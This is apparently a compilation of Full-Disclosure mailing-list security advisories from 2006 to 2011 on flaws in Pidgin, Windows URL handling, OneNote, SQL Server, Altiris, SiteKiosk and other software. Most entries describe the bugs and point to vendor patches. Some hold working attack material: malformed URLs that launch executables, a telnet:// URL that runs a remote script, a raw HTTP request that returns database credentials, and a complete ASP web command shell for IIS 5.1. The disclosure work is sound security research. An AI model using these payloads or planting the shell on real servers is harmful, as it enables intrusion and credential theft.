[Full-disclosure] Insomnia : ISVA-110822.1 - Pidgin IM Insecure URL Handling Remote Code Execution
___ Insomnia Security Vulnerability Advisory: ISVA-110822.1 ___ Name: Pidgin IM Insecure URL Handling Remote Code Execution Reported: 21 July 2011 Vendor Link: http://www.pidgin.im Affected Products: Pidgin Instant Messaging Client = 2.9.0 Original Advisory: http://www.insomniasec.com/advisories/ISVA-110822.1.htm Researcher: James Burton, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ Pidgin is an open source instant messaging client that allows users to log in to accounts on multiple chat networks simultaneously. An insecure URL handling vulnerability exists in Pidgin = 2.9.0 that can be exploited to cause remote code execution. This vulnerability requires user interaction in the form of clicking a malicious crafted URL. ___ Details ___ Pidgin supports the use of URL handlers in IM sessions. The Windows build passes URLs directly to the ShellExecute API where they are executed under the context of the user running the application. When passed through a file:// URL a malicious executable can be hosted and executed off a remote WEBDAV/SMB share. This vulnerability requires user interaction in the form of clicking a crafted URL but Pidgins Insert - Link function gives the option of adding a description which masks the underlying link. This makes the task of social engineering the target a trivial one. This vulnerability has only been confirmed over Google-Talk though exploitation over other chat networks may be possible. ___ Solution ___ Upgrade to Pidgin 2.10.0 from http://www.pidgin.im/ The Pidgin changelog can be found http://developer.pidgin.im/wiki/ChangeLog ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-110822.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability
__ Insomnia Security Vulnerability Advisory: ISVA-100216.1 ___ Name: Windows URL Handling Vulnerability Released: 16 February 2010 Vendor Link: http://www.microsoft.com/ Affected Products: Windows 2000, Windows XP, Windows 2003, Windows Vista Original Advisory: http://www.insomniasec.com/advisories/ISVA-100216.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ A flaw exists with the handling of malformed URL's passed through the ShellExeute() API. The vulnerability does not directly cause an issue within Windows itself however, applications that call the flawed API may be vulnerable to various attacks, one of which is shown in this report. ___ Details ___ The vulnerability is reached when the malformed URL contains #: and can be used to reference local files. Two such examples are shown here; acrobat://test/#://../../c:/windows/system32/calc.exe or anything://test/#://../../c:/windows/system32/calc.exe The results will be different dependant on where the URL is used and which OS platform is in use. Some examples are shown here; Start-Run Calc.exe is executed without prompt IE URL Bar or HREF User is prompted to execute calc.exe Word Document User is prompted to open acrobat link PDF Document Calc.exe is executed without prompt Firefox Firefox will not follow the URL Safari Calc.exe is executed without prompt ___ Potential Exploit ___ Safari will not access the local file through the standard file:// link, but will execute the local file through the malformed link. One method of executable delivery is through the onenote:// URL protocol if Microsoft OneNote is installed. OneNote will automatically open and process a onenote file shared over an SMB share. Any executables stored within the onenote file will be cached locally. This is done by downloading the embedded executables and storing them in a known location. C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache _Files/ This file can then be executed through the URL handling vulnerability leading to an automatic code execution issue through Safari. Obviously there are some requirements for this exploit; + the target user name must be known + Microsoft OneNote must be installed + SMB access out must be allowed ___ Solution ___ Microsoft have released a security update to address this issue; http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-100216.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-081209.1 - IE Webdav Request Parsing Heap Corruption Vulnerability
__ Insomnia Security Vulnerability Advisory: ISVA-081209.1 ___ Name: IE Webdav Request Parsing Heap Corruption Vulnerability Released: 09 December 2008 Vendor Link: http://www.microsoft.com/ Affected Products: Microsoft Internet Explorer 7 Running On Vista Requires Office 2007 Original Advisory: http://www.insomniasec.com/advisories/ISVA-081209.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ A vulnerability was found in the way that webdav requests are cached and then later retrieved by Internet Explorer. This results in the use of uninitialized memory which under the right situation can lead to command execution. ___ Details ___ When Internet Explorer loads a file from a webdav share, a copy of the file is stored in \Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV This copy is used as the cached version of the file, and is loaded if a page refresh is done. If the size of the requested file is larger that 190 characters then the webdav handling service will not save it correctly. Internet Explorer assumes that the file was stored, and is cached, so when a refresh is done it attempts to load the file information from the cached data. This leads to a heap corruption with various values read that lead to exploitable conditions. ___ Solution ___ Microsoft have released a security update to address this issue; http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-081209.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-081020.1 - Altiris Deployment Server Agent - Privilege Escalation
__ Insomnia Security Vulnerability Advisory: ISVA-081020.1 ___ Name: Altiris Deployment Server Agent - Privilege Escalation Released: 20 October 2008 Vendor Link: http://www.altiris.com/ Affected Products: Altiris Deployment Server 6.X Original Advisory: http://www.insomniasec.com/advisories/ISVA-081020.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ Altiris Deployment Server agent is installed as part of the Altiris packages to allow the Deployment Server to manage software for machines. It is usually installed to C:\Program Files\Altiris\AClient and the main running agent is called AClient.exe. By default the agent runs under the Local System account and is vulnerable to numerous Shatter Attack vulnerabilities leading to an attacker running code under the Local System privilege. We reported a first instance of this vulnerability which was then patched, we then alerted Symantec to the second vulnerability. ___ Details ___ The main windows of the AClient GUI has a hidden button that can be seen using a resource viewer such as MS Spy++. The button has a caption of command prompt. Clicking this button causes the GUI to attempt to call CreateProcess() with the following CommandLine parameter. c:\Program Files\Altiris\AClient\cmd.exe The AClient GUI also has a ListView control which can be which can be used to overwrite process memory. Using the ListView, it is possible to overwrite a static pointer to modify the CommandLine parameter in such a way that a cmd.exe shell is executed with SYSTEM level privileges. We then reported the second issue. The deployment server agent makes use of the LoadLibrary() API function and passes a static address of a string from with the data segment. By exploiting the ListView to overwrite the data segment string, it is possible to cause the agent to load a malicious dll file. From the aclient.exe code 004AA890 PUSH ESI 004AA891 PUSH EDI 004AA892 PUSH AClient.005858A0; ASCII kernel32.dll 004AA897 XOR EDI,EDI 004AA899 CALL DWORD PTR DS:[KERNEL32.LoadLibrar; The malicious dll file can then spawn a command shell, or similar, running under the LocalSystem context. ___ Solution ___ Symantec have released a security update to address this issue; http://www.symantec.com/avcenter/security/Content/2008.10.20a.html ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-081020.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability
__ Insomnia Security Vulnerability Advisory: ISVA-080910.1 ___ Name: MS Office OneNote URL Handling Vulnerability Released: 10 September 2008 Vendor Link: http://http://office.microsoft.com/onenote Affected Products: MS Office Onenote 2007 MS Office 2003 and 2007 have vulnerable components Original Advisory: http://www.insomniasec.com/advisories/ISVA-080910.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ OneNote is included as part of office 2007, and provides an easy way to store, manage, and share information. OneNote installs a URL Handler under the registry key HKEY_CLASSES_ROOT\OneNote with an open command specified as C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink %1 Due to the URL Handler, OneNote can be started from Internet Explorer through a URI reference of onenote://onenotefile Where onenotefile is a locally hosted file, or a file accessible through a UNC/WebDav share. The instance of onenote started will executed through the IEUSER.EXE process running under the currently logged in user. OneNote is one of the few Microsoft installed applications that does NOT PROMPT the user, before executing from the URL. Through the use of command line switches passed to OneNote from a URL, we found two exploitation scenarios. ___ Details ___ - File Transfer to Client - OneNote accepts a command switch to specify the location of the local cache directory. By specifying this switch on the URL It is possible to specify an arbitrary location on the client, which will be used to cache the opened notebooks. If a notebook is loaded from a remote share, a local copy will be created under the cache directory. When OneNote caches the notebook it makes a local copy of any binary files that are embedded inside the notebook. This allows the placement of binary files in a 'semi arbitrary' location that can then be used in conjunction with social engineering emails, or other attacks that require the knowledge of the location of a file. There may also be other attack vectors through the placement of specially named files within search paths. - Theft of Users OneNote Notebooks - OneNote accepts a command switch to specify the location of the backup directory. It is possible to specify a SMB share location on a remote server, which will be used to backup the notebooks. This results in copies of all opened notebooks been sent to the remote share. ___ Solution ___ Microsoft have released a security update to address this issue; http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-080910.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-080709.1 - Microsoft SQL Server - Corrupt Backup File Heap Overflow
__
Insomnia Security Vulnerability Advisory: ISVA-080709.1
___
Name: Microsoft SQL Server - Corrupt Backup File Heap Overflow
Released: 09 July 2008
Vendor Link:
http://www.microsoft.com/sql/default.mspx
Affected Products:
MS SQL Server 2005, possibly previous versions
Original Advisory:
http://www.insomniasec.com/advisories/ISVA-080709.1.htm
Researcher:
Brett Moore, Insomnia Security
http://www.insomniasec.com
___
___
Description
___
Microsoft SQL Server contains a buffer overflow that can be reached
by causing the server to attempt a database restore from a corrupt
back file.
This can be triggered by a user with PUBLIC access through the
RESTORE TSQL statement, available through the console as well as
through a vulnerable SQL statement on a web server (sql injection)
By default the service runs under the NETWORK SERVICE account but
has the ability to impersonate through tokens, and therefore
can gain full LOCAL SYSTEM account access.
___
Details
___
The following TSQL statement can be called by any user with PUBLIC
access.
RESTORE FILELISTONLY FROM DISK = 'path to file'
By hosting a corrupt SQL database backup on a remote file share
it is possible to force the target server to open the file, parse
it, and corrupt the internal heap.
Obviously the target SQL server must have egress availability to
connect out through SMB or webdav functionality.
The SQL backup format consists of multiple chunks of data which
follow a basic structure of
struct backupChunk {
unsigned long nametag;
unsigned long size;
}
The nametag describes the type of tag (ex.SCIN, SFGI, MQCI, etc).
The size corresponds to the size of the complete chunk size which
includes the 8byte chunk header.
The parsing function goes through file using the backupChunk-size
field to point to the next valid chunk.
---
022E5FE2 PUSH EAX
022E5FE3 MOV EAX, [ESP+18h]
022E5FE7 PUSH EAX
022E5FE8 PUSH ESI
022E5FE9 CALL EDX ; -- This loads the 8byte header of the block
022E5FEB PUSH EBX
022E5FEC MOV ECX,ESI
---
If the size field is larger than the current buffer, a check
prevents the application from overflowing.
---
Size Check
022E6063 MOV EAX,DWORD PTR DS:[EDX+4] ;- Load Size
022E6066 MOV ECX,DWORD PTR SS:[ESP+14] ;- Load Buffer Size
022E606A SUB ECX,EAX
022E606C JS SHORT sqlservr.022E6076
022E606E CMP EAX,DWORD PTR DS:[EBX+C8] ;- Compare against 0x2000
022E6074 JBE SHORT sqlservr.022E60DC ;- Jump to continuation
---
After this size comparison, the size is adjusted to subtract the
size of the 8byte structure header.
---
The size decrease
022E60DC MOV ECX,DWORD PTR SS:[ESP+10]
022E60E0 MOV EDI,DWORD PTR DS:[ECX+4]
022E60E3 SUB EDI,8; - Subtract 8 bytes
022E60E6 CMP DWORD PTR DS:[EBX+40],0
022E60EA JA SHORT sqlservr.022E6107
---
If the structure size was a value between 0 and 7 then an Integer
Underflow/Overflow/Wraparound/Whatever will occur, and the
'negative' large value is passed directly into the StartRead
function.
---
The write
022E6115 MOV EDX,DWORD PTR DS:[EDX+60]
022E6118 PUSH EDI; - Push the new 'negative' size
022E6119 PUSH EAX
022E611A MOV EAX,DWORD PTR SS:[ESP+18]
022E611E ADD EAX,8
022E6121 PUSH EAX
022E6122 PUSH ESI
022E6123 CALL EDX; call StartRead
022E6125 PUSH EBX
---
StartRead, among other things, uses the size value in a call to
_memcpy, that will read the available data from the file
overflowing the buffer and overwriting heap memory.
---
022D44BC MOV EBX,[EBP+arg_4]
022D44BF PUSH ESI ; - The 'negative' size
022D44C0 PUSH EAX ; void *
022D44C1 PUSH EBX ; void *
022D44C2 CALL _MEMCPY ; - Call to memcpy
---
The result of exploitation is that heap memory is overflowed.
We have had successful exploitable 'exceptions' in the following
places;
---
A 'write 4'
0116D35A JE sqlservr.011C6BCE
0116D360 MOV EAX,DWORD PTR DS:[EAX+C]
0116D363 MOV ECX,DWORD PTR SS:[EBP-10]
0116D366 MOV EDX,DWORD
[Full-disclosure] Insomnia : ISVA-080516.1 - Altiris Deployment Solution - SQL Injection
__ Insomnia Security Vulnerability Advisory: ISVA-080516.1 ___ Name: Altiris Deployment Solution - SQL Injection Released: 16 May 2008 Vendor Link: http://www.altiris.com/ Affected Products: Altiris Deployment Solution 6.8.x 6.9.x Original Advisory: http://www.insomniasec.com/advisories/ISVA-080516.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ Altiris deployment solution is a suite installed to manage the configuration and operation of machines on the network. SQL Server is used as the backend database. Altiris deployment solution listens for connections from the Altiris client on port 402. It is possible to make a request that will result in the exploitation of a SQL Injection vulnerability. This leads to database access under the context of the Deployment server, which typically then allows, command execution under the context of the SQL Server. Note that through access to the SQL server, it is possible to take control of all clients managed by the server. ___ Details ___ When a client machine that is running Altiris client 'comes alive' it makes contact with the Deployment server and sends a notification packet to alert the server that the client machine is available. This packet is an ASCII based packet with a terminating NULL character. At least two of the strings contained in this packet can be used to inject arbitrary SQL syntax into a SQL call, resulting in SQL injection. ___ Solution ___ Symantec have released a security update to address this issue; http://www.symantec.com/avcenter/security/Content/2008.05.14a.html ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-080516.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-080516.2 - Altiris Deployment Solution - Domain Account Disclosure
__ Insomnia Security Vulnerability Advisory: ISVA-080516.2 ___ Name: Altiris Deployment Solution - Domain Account Disclosure Released: 16 May 2008 Vendor Link: http://www.altiris.com/ Affected Products: Altiris Deployment Solution 6.8.x 6.9.x Original Advisory: http://www.insomniasec.com/advisories/ISVA-080516.2.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ Altiris deployment solution is a suite installed to manage the configuration and operation of machines on the network. Part of the Deployment solution setup involves configuring the domain accounts to be used to access the various clients for imaging and configuration jobs. Altiris deployment solution listens for connections from the Altiris client on port 402. It is possible to make a request to this port that will result in the encrypted domain credentials being returned. The encryption is not salted or specific to the install, allowing for offsite decryption of the credentials. ___ Details ___ The retrieved encrypted credentials can be placed into a local installation, through direct insertion into the SQL server database. The GUI can then be used to view the decrypted credentials. Alternatively a standalone tool to decrypt the credentials could easily be written. ___ Solution ___ Symantec have released a security update to address this issue; http://www.symantec.com/avcenter/security/Content/2008.05.14a.html ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-080516.2 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SUN Java JNLP Overflow
= SUN Java JNLP Overflow = = Vendor Advisory: = http://sunsolve.sun.com/search/document.do?assetkey=1-26-102996-1 = = Affected Software: = Java Web Start in JDK and JRE 6 Update 1 and earlier = Java Web Start in JDK and JRE 5.0 Update 11 and earlier = = Public disclosure on Wednesday July 11, 2007 == Overview == http://www.google.co.nz/search?hl=enq=same+bug+different+appmeta= My guess is that two years down the track, nobody really took any notice. EEYE posted out there advisory, a couple of days ago. Check it if you want the technical details. Not surprising that it was also discovered by another person, and most likely more than one. 1) Start-Regedit 2) Edit-Search-editflags 3) Find those that have a flag set of BINARY 00 00 01 00 4) *yawn* 5) Find a valid file of that type http://java.sun.com/j2se/1.4.2/docs/guide/jws/developersguide/syntax.htm l 6) Try a long string in an obvious place 7) Watch the debugger kick in 8) Finish your cup of coffee == Solutions == SUN has released a patch http://sunsolve.sun.com/search/document.do?assetkey=1-26-102996-1 This class of vulnerability is well known, and future cases can be mitigated by removing or modifying the editflags value for all registry entries that have 'Disable Open/Save dialog box' set. http://mc-computing.com/WinExplorer/WinExplorerEditFlags.htm == Credit == Discovered and advised to SUN November 15 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com RD team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities
= Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities = = Vendor Website: = http://www.lizardtech.com/ = = Affected Version: =Windows DjVu Browser Plug-in 6.1.1 = = Public disclosure on February 15th 2007 == Overview == The DjVu Browser Plug-in is the primary means of viewing DjVu documents. It runs inside most modern browsers including IE, Firefox and Safari. Versions prior to 6.1.1 are vulnerable to buffer overflows through various functions. One such example is through the ExportImageAs method. It should be noted that CERT contacted Lizardtech at about the same time as we did, advising of numerous overflow problems as well. These have also been addressed by this update. == Solutions == - Upgrade to version 6.1.1 from the lizardtech website http://www.lizardtech.com/ == Credit == Discovered and advised to Lizardtech November 2006, by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com RD team are globally recognised through their release of whitepapers and presentations related to new security research.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS Interactive Training .cbo Overflow
= MS Interactive Training .cbo Overflow = = MS Bulletin posted: = http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx = = Affected Software: =Microsoft Windows 2000 =Microsoft Windows XP =Microsoft Windows Server 2003 = = Public disclosure on February 14, 2007 == Overview == When thinking about buffer overflow vulnerabilities, a file can sometimes be as harmful as a packet. Even though past security issues have taught us that it is unwise to use a string from a file/packet without first checking its length, this is what happened here. MS Interactive Training will open a file with a .cbo extension and read in the Syllabus details. Through the creation of a corrupt file, with a long Syllabus string it is possible to gain control of EIP and execute arbitrary code. == Exploitation == Remote exploitation through Internet Explorer can be obtained through hosting a malicious .cbo file which will be downloaded and opened automatically. == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft May, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com RD team are globally recognised through their release of whitepapers and presentations related to new security research. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Project Server 2003 - Credential Disclosure
==
% Project Server 2003 - Credential Disclosure
% [EMAIL PROTECTED]
==
Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).
One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.
--
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=valid cookie
Request
GetInitializationData
Release1/Release
/GetInitializationData
/Request
Reply
HRESULT0/HRESULT
STATUS0/STATUS
UserNametheuser/UserName
GetInitializationData
GetLoginInformation
DBType0/DBType
DVR{SQLServer}/DVR
DBProjectServer/DB
SVRSERVER/SVR
ResGlobalID1/ResGlobalID
ResGlobalNameresglobal/ResGlobalName
UserNameMSProjectUser/UserName
Passwordsekretpass/Password
UserNTAccountSERVER\USER/UserNTAccount
/GetLoginInformation
/Reply
--
Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a
login with a valid username and password.
* Since the thick client is 'client side' any sql can be
manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also
be able to be made through this method.
==
%
==
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASP Cmd Shell On IIS 5.1
% ASP Cmd Shell On IIS 5.1 % [EMAIL PROTECTED] ASP shells have been around since the dawn of time. On IIS 5.0 and prior it was simple to create a 'command prompt shell' using code similar to; % Set oS = Server.CreateObject(WSCRIPT.SHELL) output = oS.exec(cmd.exe /c request(command)).stdout.readall response.write output % Permissions changes in IIS 5.1 prevented this method from working as execution access was revoked to the IUSR_Machine user. During one boring afternoon it was decided to find a way around this, and what we found was 'slightly' interesting. When IIS checks to see if an executable has 'execute' rights it is checking against IUSR_Machine. If execute rights are granted then the new process is created, under the IWAM_Machine account. Thus all that was needed was an executable that could be run by IUSR_Machine and would then spawn an instance of cmd.exe. We set about seeing what executables could be run by IUSR_Machine. It turns out that execution access has been revoked to all files with the .exe extension. We did however locate several .com files that could still be executed. One in particular 'win.com' takes a command line as a parameter and will execute it. Because of the 'double spawning' we can not make use of .stdout.readall, and need to revert to outputting to a file, and reading it back in. Due to the process executing under a different account than that of the ASP processor, we need to jump through a couple of hoops. * The folder that we use must be WRITEABLE by IWAM_Machine * The folder that we use must be READABLE by IUSR_Machine * We need to alter file permissions to allow IUSR_Machine access to read the file created by IWAM_Machine The accesschk tool from sysinternals, can easily identify a valid location. Our testings came up with c:\windows\pchealth\ERRORREP\QHEADLES\ IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and therefore this technique will not work on that platform. % Dim oS,oSNet,oFSys, oF,szCMD, szTF On Error Resume Next Set oS = Server.CreateObject(WSCRIPT.SHELL) Set oSNet = Server.CreateObject(WSCRIPT.NETWORK) Set oFSys = Server.CreateObject(Scripting.FileSystemObject) szCMD = Request.Form(C) If (szCMD ) Then szTF = c:\windows\pchealth\ERRORREP\QHEADLES\ oFSys.GetTempName() ' Here we do the command Call oS.Run(win.com cmd.exe /c szCMD szTF ,0,True) response.write szTF ' Change perms Call oS.Run(win.com cmd.exe /c cacls.exe szTF /E /G everyone:F,0,True) Set oF = oFSys.OpenTextFile(szTF,1,False,0) End If % FORM action=%= Request.ServerVariables(URL) % method=POST input type=text name=C size=70 value=%= szCMD % input type=submit value=Run/FORMPRE Machine: %=oSNet.ComputerName%BR Username: %=oSNet.UserName%br % If (IsObject(oF)) Then On Error Resume Next Response.Write Server.HTMLEncode(oF.ReadAll) oF.Close Call oS.Run(win.com cmd.exe /c del szTF,0,True) End If % % ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HyperAccess - Multiple Vulnerabilities
Not long now... = Hyper Access - Multiple Vulnerabilities = = Vendor Website: = http://www.hilgraeve.com = = Affected Software: = Hyper Access 8.4 (and possibly lower) = = Public disclosure on Thursday December 14, 2006 == Overview == HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and HyperTerminal Private Edition. It is the product from which HyperTerminal and HyperTerminal Private Edition are derived. HyperAccess offers a wide array of additional capabilities, with a similar look andfeel. This advisory discloses two separate (but similar) security issues in the latest version of HyperAccess . * Command Execution Through .HAW Opening * HyperAccess saves 'sessions' as .haw files. These extensions are setup to open without user intervention, through the editflags setting the in the registry key: HKEY_CLASSES_ROOT\HAWin32\EditFlags. If a user, using Internet Explorer, browses to a web site that hosts a .HAW, an automatic download and open can be forced. The file will be opened and parsed by the installed version of HyperAccess. A .HAW file can be saved with an option 'Script To Run Before Connecting' and this can be setup to load a script file from either an SMB share or a WEBDAV web share. The script command offered by HyperAccess include built in commands as well as standard vbscript. This allows the creation of a script that uses WScript.Shell to spawn other executables. This attack requires the target to visit the attackers website, and be able to connect to the remote share. A suggested fix is to remove/modify the editflags setting to prevent the automatic opening and parsing of .HAW files. * Command Execution Through Telnet URL Protocol * HyperAccess sets up a URL Protocol to handle the telnet:// URL handler. This setting can be viewed in the registry key: HKEY_CLASSES_ROOT\telnet\shell\open\command which is set to c:\program files\hawin32\hawin32.exe /t %1 HyperAccess will accept /r as a command line parameter to specify a script file to run. This command can be passed on the URL through Internet Explorer using a URL such as; telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt Where SERVER is an SMB share or a WEBDAV web share hosting a malicious script to run. The script command offered by Hyperaccess include built in commands as well as standard vbscript. This allows the creation of a script that uses WScript.Shell to spawn other executables. This attack requires the target to visit the attackers website, and be able to connect to the remote share. A suggested fix is to remove the telnet handler from the registry. == Solutions == Currently, the issues outlined in the report have been added to a list of issues to evaluate during the next update of HyperACCESS. There is currently no planned date for this update. == Credit == Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com RD team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SBDA] SiteKiosk - FileSystem Access
Still time before Christmas. = SiteKiosk - FileSystem Access = = Vendor Website: = http://www.sitekiosk.com/ = = Affected Software: = SiteKiosk 6.5.150 = = Public disclosure on Tuesday December 12, 2006 == Overview == SiteKiosk is an application used to secure public access terminals. It is designed to provide a safe and stable way for the use of public access terminals with or without access to the Internet. SiteKiosk is based on Internet Explorer and can be configured to individually restrict access to Web sites, the operating system, system settings, and applications. Your computer will be protected against any manipulation from the time you boot until you shut it down. SiteKiosk suffers from a cross site scripting vulnerability, that leads to filesystem access. == Exploitation == SiteKiosk implements a 'skinning' feature so that the layout and display of the browser can be modified. The 'skinning' feature uses an HTML aware control for the modified title bar of the main SiteKiosk window. SiteKiosk displays the URL of the current location in the title bar of the main window, and therefore any HTML code in the location will be included in the title bar. By default, SiteKiosk does not properly handle the ABOUT: prefix. The URL is directly outputted to the screen leading to a normal cross site scripting vulnerability. Because the URL is also outputted to the title bar, script can be executed under the LOCAL computer zone. If a user types the following into the address box, or browses a site that sets the location to; ABOUT:helloa href=\click here/a The title bar will display a hyperlink. By clicking on this HREF in the main windows title bar, the filesystem will be accessed with an explorer window. SiteKiosk also installs some activeX controls that are marked 'safe for scripting'. One of these controls exposes two dangerous methods that allow a SiteKiosk user to read and download any file from the kiosk with the permissions of the user running SiteKiosk. == Solutions == A new version of SiteKiosk has been released that addresses these vulnerabilities. It can be downloaded from http://www.sitekiosk.com. == Credit == Discovered and advised to SiteKiosk November 30, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish 